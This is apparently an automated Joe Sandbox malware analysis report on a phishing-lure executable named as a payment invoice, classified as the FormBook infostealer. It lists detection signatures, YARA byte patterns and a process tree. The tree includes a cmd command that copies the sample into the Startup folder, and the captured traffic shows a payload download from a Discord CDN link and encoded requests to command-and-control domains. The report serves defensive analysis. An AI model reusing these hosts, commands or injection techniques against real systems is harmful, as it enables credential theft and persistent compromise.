Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment INV NO. 230203-1USD.exe

Overview

General Information

Sample Name:Payment INV NO. 230203-1USD.exe
Analysis ID:813147
MD5:d6460e1a62bfb5366fff5959b99bbede
SHA1:75e6b58b7c75378acbe604cb29e4a779952757d7
SHA256:6351ce9e7c69556cddc78ca84e2638490c98f507d0ac3816e81bead777da7edf
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected MSILDownloaderGeneric
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Drops PE files to the startup folder
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
Uses ipconfig to lookup or modify the Windows network settings
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Payment INV NO. 230203-1USD.exe (PID: 2332 cmdline: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe MD5: D6460E1A62BFB5366FFF5959B99BBEDE)
    • cmd.exe (PID: 4440 cmdline: C:\Windows\System32\cmd.exe" /c Copy "C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Payment INV NO. 230203-1USD.exe (PID: 3712 cmdline: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe MD5: D6460E1A62BFB5366FFF5959B99BBEDE)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Payment INV NO. 230203-1USD.exe (PID: 5224 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe" MD5: D6460E1A62BFB5366FFF5959B99BBEDE)
          • Payment INV NO. 230203-1USD.exe (PID: 4444 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe MD5: D6460E1A62BFB5366FFF5959B99BBEDE)
        • ipconfig.exe (PID: 1888 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
        • autofmt.exe (PID: 5148 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • ipconfig.exe (PID: 3872 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.388331806.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.388331806.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x20e63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xcc22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x1a09a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000007.00000002.388331806.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x19e98:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x19934:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x19f9a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1a112:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xc7ed:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x18b8f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1fc0a:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x20bbd:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.333839662.00000000026C8000.00000004.00000800.00020000.00000000.sdmpSUSP_Reversed_Base64_Encoded_EXEDetects an base64 encoded executable with reversed charactersFlorian Roth (Nextron Systems)
    • 0x12aec:$s5: AEAAAAMAAQqVT
    • 0x12a5d:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
    00000008.00000002.582093453.0000000002DA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.Payment INV NO. 230203-1USD.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        7.2.Payment INV NO. 230203-1USD.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20e63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xcc22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1a09a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        7.2.Payment INV NO. 230203-1USD.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19e98:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x19934:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x19f9a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1a112:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xc7ed:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x18b8f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1fc0a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x20bbd:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.Payment INV NO. 230203-1USD.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          7.2.Payment INV NO. 230203-1USD.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xbe22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1929a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: Payment INV NO. 230203-1USD.exeVirustotal: Detection: 7%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 7.2.Payment INV NO. 230203-1USD.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.Payment INV NO. 230203-1USD.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.388331806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.582093453.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.581974891.0000000002CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.396177857.0000000001230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.401587314.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.582148968.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.2463.orgwww.2463.orgAvira URL Cloud: Label: malware
          Source: http://www.transformertabletable.com/c4mw/Avira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloud/c4mw/Avira URL Cloud: Label: phishing
          Source: http://www.dylnov.ruwww.dylnov.ruAvira URL Cloud: Label: malware
          Source: http://www.toporsche.online/c4mw/Avira URL Cloud: Label: malware
          Source: http://www.2463.orgAvira URL Cloud: Label: malware
          Source: http://www.transformertabletable.comwww.transformertabletable.comAvira URL Cloud: Label: malware
          Source: http://www.2463.org/c4mw/Avira URL Cloud: Label: malware
          Source: http://www.transformertabletable.comAvira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloudAvira URL Cloud: Label: phishing
          Source: http://www.toporsche.onlineAvira URL Cloud: Label: malware
          Source: http://www.dylnov.ruAvira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloudwww.genuineinsights.cloudAvira URL Cloud: Label: phishing
          Source: http://www.toporsche.online/c4mw/HAvira URL Cloud: Label: malware
          Source: http://www.toporsche.onlinewww.toporsche.onlineAvira URL Cloud: Label: malware
          Source: http://www.dylnov.ru/c4mw/Avira URL Cloud: Label: malware
          Source: 7.2.Payment INV NO. 230203-1USD.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Payment INV NO. 230203-1USD.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: Payment INV NO. 230203-1USD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: ipconfig.pdb source: Payment INV NO. 230203-1USD.exe, 00000007.00000002.395781651.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: Payment INV NO. 230203-1USD.exe, 00000007.00000002.395781651.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\PRIVATESTUB - powershell\ClassLibrary1\obj\Release\ClassLibrary1.pdb source: Payment INV NO. 230203-1USD.exe, 00000000.00000002.333839662.00000000029D8000.00000004.00000800.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000000.00000002.342535829.0000000006490000.00000004.08000000.00040000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000006.00000002.379618522.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000006.00000002.379618522.0000000003192000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\MultiChannelQueueModels\obj\Debug\HxD.pdb source: Payment INV NO. 230203-1USD.exe, Payment INV NO. 230203-1USD.exe.1.dr
          Source: Binary string: C:\Users\Administrator\Desktop\PRIVATESTUB - powershell\Zlas\obj\Release\Zlas.pdb source: Payment INV NO. 230203-1USD.exe, 00000000.00000002.341938580.0000000005E10000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Payment INV NO. 230203-1USD.exe, 00000004.00000003.334116192.00000000015D1000.00000004.00000020.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000004.00000003.331879839.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000007.00000002.396874473.0000000001850000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000008.00000002.583001043.00000000037BF000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000008.00000003.396731237.0000000003500000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000008.00000002.583001043.00000000036A0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 0000000A.00000002.401814443.0000000002E8F000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 0000000A.00000003.398592445.0000000002BD4000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 0000000A.00000003.394760969.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 0000000A.00000002.401814443.0000000002D70000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Payment INV NO. 230203-1USD.exe, Payment INV NO. 230203-1USD.exe, 00000004.00000003.334116192.00000000015D1000.00000004.00000020.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000004.00000003.331879839.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000007.00000002.396874473.0000000001850000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000008.00000002.583001043.00000000037BF000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000008.00000003.396731237.0000000003500000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000008.00000002.583001043.00000000036A0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 0000000A.00000002.401814443.0000000002E8F000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 0000000A.00000003.398592445.0000000002BD4000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 0000000A.00000003.394760969.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 0000000A.00000002.401814443.0000000002D70000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\MultiChannelQueueModels\obj\Debug\HxD.pdbX source: Payment INV NO. 230203-1USD.exe, Payment INV NO. 230203-1USD.exe.1.dr

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 20.216.185.237 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.idszua.com
          Source: C:\Windows\explorer.exeNetwork Connect: 194.102.227.30 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lokoua.com
          Source: C:\Windows\explorer.exeDomain query: www.chernenko.xyz
          Source: C:\Windows\explorer.exeDomain query: www.cutgang.net
          Source: C:\Windows\explorer.exeNetwork Connect: 83.229.19.64 80Jump to behavior
          Yara detected MSILDownloaderGeneric
          Source: Yara matchFile source: Process Memory Space: Payment INV NO. 230203-1USD.exe PID: 2332, type: MEMORYSTR
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.chernenko.xyz
          Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: global trafficHTTP traffic detected: GET /attachments/1072614287295660156/1076965214899146822/702 HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /attachments/1072614287295660156/1076965214899146822/702 HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /c4mw/?Zq2=eUC8uwYyRxSeyYpSpO2Id78Q83vjRtDBPFOU2IN8r2HfZgJaOQlHD+kqnlWKRqcc2HVOfraHNMQASxEYc4wWxpLoACDs+5Tjdg==&qF=hJ8nKRQ HTTP/1.1Host: www.chernenko.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c4mw/?Zq2=vLbIJTjaxi6VX2N+/Nw9CZTUcQ26TCmrvgrmgSoK7uvpnCbJI4wuwNhEzhrO+jOdriENsB2e9KNKFJNLYQWdyqDzg75x9Sdq9w==&qF=hJ8nKRQ HTTP/1.1Host: www.lokoua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
          Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
          Source: global trafficHTTP traffic detected: POST /c4mw/ HTTP/1.1Host: www.lokoua.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.lokoua.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lokoua.com/c4mw/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 5a 71 32 3d 69 4a 7a 6f 4b 6a 62 55 76 79 47 37 4f 6e 31 51 28 64 41 71 64 70 28 2d 63 31 61 37 63 41 71 4b 68 45 33 6a 73 78 63 45 33 61 44 6a 6f 57 50 50 48 37 41 65 32 71 56 6c 38 32 6a 44 79 68 79 69 31 53 59 70 71 42 7a 57 36 37 31 38 49 72 4e 69 51 43 79 63 30 35 54 54 34 66 31 64 6a 78 5a 33 34 63 55 4d 55 35 31 78 42 65 73 78 77 74 58 4c 49 58 69 70 71 61 50 7a 68 54 5a 33 5a 2d 4d 4e 55 6d 39 75 59 68 37 65 49 61 77 75 4b 64 42 42 6e 75 55 54 79 4f 34 5f 74 74 6a 4c 30 5f 68 33 5a 73 53 67 6a 59 78 61 47 41 76 43 61 4d 38 71 67 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Zq2=iJzoKjbUvyG7On1Q(dAqdp(-c1a7cAqKhE3jsxcE3aDjoWPPH7Ae2qVl82jDyhyi1SYpqBzW6718IrNiQCyc05TT4f1djxZ34cUMU51xBesxwtXLIXipqaPzhTZ3Z-MNUm9uYh7eIawuKdBBnuUTyO4_ttjL0_h3ZsSgjYxaGAvCaM8qgA).
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Feb 2023 07:37:18 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 68 65 72 6e 65 6e 6b 6f 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.chernenko.xyz Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 Feb 2023 07:38:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesData Raw: 35 63 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 2c 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 6e 20 54 72 6f 75 76 c3 a9 3c 2f 48 31 3e 0a 4c 65 20 64 6f 63 75 6d 65 6e 74 20 64 65 6d 61 6e 64 c3 a9 20 6e 27 61 20 70 61 73 20 c3 a9 74 c3 a9 20 74 72 6f 75 76 c3 a9 20 73 75 72 20 63 65 20 73 65 72 76 65 75 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 20 45 6e 63 6f 6e 74 72 61 64 6f 3c 2f 48 31 3e 0a 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 73 65 20 65 6e 63 6f 6e 74 72 c3 b3 20 65 6e 20 65 73 74 65 20 73 65 72 76 69 64 6f 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 6b 6f 75 61 2e 63 6f 6d 20 20 7c 20 20 50 6f 77 65 72 65 64 20 62 79 20 77 77 77 2e 6c 77 73 2e 66 72 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f
          Source: Payment INV NO. 230203-1USD.exe, 00000006.00000002.375644051.0000000001067000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: Payment INV NO. 230203-1USD.exe, 00000000.00000002.333839662.0000000002681000.00000004.00000800.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000006.00000002.379618522.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.2463.org
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.2463.org/c4mw/
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.2463.orgwww.2463.org
          Source: explorer.exe, 00000005.00000000.337016856.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.581807825.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.chernenko.xyz
          Source: explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.chernenko.xyz/c4mw/
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.chernenko.xyzwww.chernenko.xyz
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cmproutdoors.com
